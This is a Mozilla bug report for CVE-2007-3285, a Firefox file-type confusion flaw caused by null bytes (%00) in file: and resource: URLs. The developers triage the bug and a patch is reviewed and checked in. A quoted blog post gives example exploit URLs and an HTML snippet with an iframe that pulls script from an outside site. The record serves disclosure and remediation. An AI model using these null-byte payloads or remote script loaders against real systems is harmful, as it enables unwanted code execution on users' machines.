Closed Bug 383478 (CVE-2007-3285) Opened 17 years ago Closed 17 years ago

File type confusion vulnerability due to null bytes in URL (encoded as %00)

Categories

(Core :: Security, defect, P1)

Product:
Core
Component:
Security
Platform:
x86
Windows XP
Type:
defect

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: ws, Assigned: dveditz)

References

(
URL
)

Details

(Keywords: fixed1.8.0.13, fixed1.8.1.5, Whiteboard: [sg:low] file:/// not available from web)

Attachments

(2 files)

Totally untested fix to IsExecutable
1.18 KB, patch
Details | Diff | Splinter Review
fail if file: has embedded %00
3.52 KB, patch
dveditz
: review+
bzbarsky
: superreview+
jay
: approval1.8.1.5+
Details | Diff | Splinter Review 
Posted on 0x000000.com by Ronald van den Heetkamp

Firefox Remote & Local Code Excution 0day.

I found this vulnerability in Firefox moments ago while I was playing with the urlbar.
It seems Firefox is vulnerable to null byte file type corruption. It is possible to execute files as a different filetype and trick Firefox into executing it. Is this dangerous? yeah it's pretty bad.

Pointers that are vulnerable:

file:///
resource:

Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]

Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html

or:

resource:///README.txt%00.html

More filetypes:

file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.

Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)

This could lead to various exploits, to name a few:

- Dossing a user, the above example does it almost.
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)

Another example
It is possible to turn regular .txt stored files into full Javascript html zombies:
file:///[filelocation]/troy.txt%00.html

troy.txt could contain:

/*
Bunch of malicious Javascript
*/

Or:

<html>
<iframe name="bla" src="http://www.0x000000.com/hacks/?troy.js" width="100%" height="900"></iframe>
</html>


Well, I guess you get the point: nasty.


Posted on 06 06 07 by 0x000000
Whiteboard: [sg:investigate]
Summary: Potential Firefox Remote & Local Code Excution 0day → File type confusion vulnerability due to null bytes in URL (encoded as %00)
The comments on that blog, and my testing, seem to indicate that this "exploit" doesn't work remotely (at least not in 2004 due to the resource:// protocol fixes).
Assignee: dveditz → nobody
Component: General → Security
QA Contact: general → firefox
(though it would be interesting to know what troy.js contains, I can't seem to access that file...)
Assignee: nobody → dveditz
We only pass things to Windows if they don't have an executable extension, but we do that test on an nsAString; see nsLocalFile::IsExecutable in nsLocalFileWin.cpp.  On the other hand, nsLocalFile::Launch passes a PRUnichar* pointer to ShellExecute, since that's what the API takes.  We should probably either disallow nulls inside nsLocalFile filenames or change IsExecutable to check the same thing that Launch() will use.  The latter is probably simpler, while the former would generally be better.
We'll still lie about which helper app we'll use... but at least we'll check the IsExecutable() thing correctly.
Note that nsLocalFile::AppendInternal and nsLocalFile::InitWithPath already do some sanity checks with slashes and whatnot.  So we should probably just add similar checks for nulls.  And perhaps look at the other nsLocalFile impls too.
Product: Firefox → Core
QA Contact: firefox → toolkit
Flags: blocking1.9?
Flags: blocking1.8.1.5?
Flags: blocking1.8.0.13?
Luckily file:/// is not available from web pages, and in the limited contexts resource: is allowed (script, stylesheets, images, xbl) we ignore requests going to an external helper app.

But if you knew the location of a local file and could somehow get the user to save and execute your .html (an email attachment or other) this might work.
Whiteboard: [sg:investigate] → [sg:low] file:/// not available from web
Flags: blocking1.9? → blocking1.9+
Flags: blocking1.8.1.5?
Flags: blocking1.8.1.5+
Flags: blocking1.8.0.13?
Flags: blocking1.8.0.13+
Alias: CVE-2007-3285
This stops the exploit by checking for an embedded null before creating the local file object. I'm not totally happy with it because it doesn't throw an error page they way an embedded %01 pointing at a non-existing file does, but that's rather minor.
Attachment #272054 - Flags: superreview?(bzbarsky)
Attachment #272054 - Flags: review?(cbiesinger)
Comment on attachment 272054 [details] [diff] [review]
fail if file: has embedded %00

Looks OK to me, but I still wonder whether we should also fix this on the XPCOM level.
Attachment #272054 - Flags: superreview?(bzbarsky) → superreview+
Comment on attachment 272054 [details] [diff] [review]
fail if file: has embedded %00

Darin replied by mail: "Seems OK.  It is unfortunate that the file URL to file path conversion functions do not share some boiler-plate code that you could patch instead."
Attachment #272054 - Flags: review?(cbiesinger) → review+
Comment on attachment 272054 [details] [diff] [review]
fail if file: has embedded %00

Approved for 1.8 branch, a=jay for drivers
Attachment #272054 - Flags: approval1.8.1.5+
Keywords: fixed1.8.1.5
Fix checked into trunk and branches
Keywords: fixed1.8.0.13
Flags: in-testsuite?
If this is checked-in on trunk, should it still be open?
Marking fixed, reopen if I've made a mistake.
Status: NEW → RESOLVED
Closed: 17 years ago
Priority: -- → P1
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: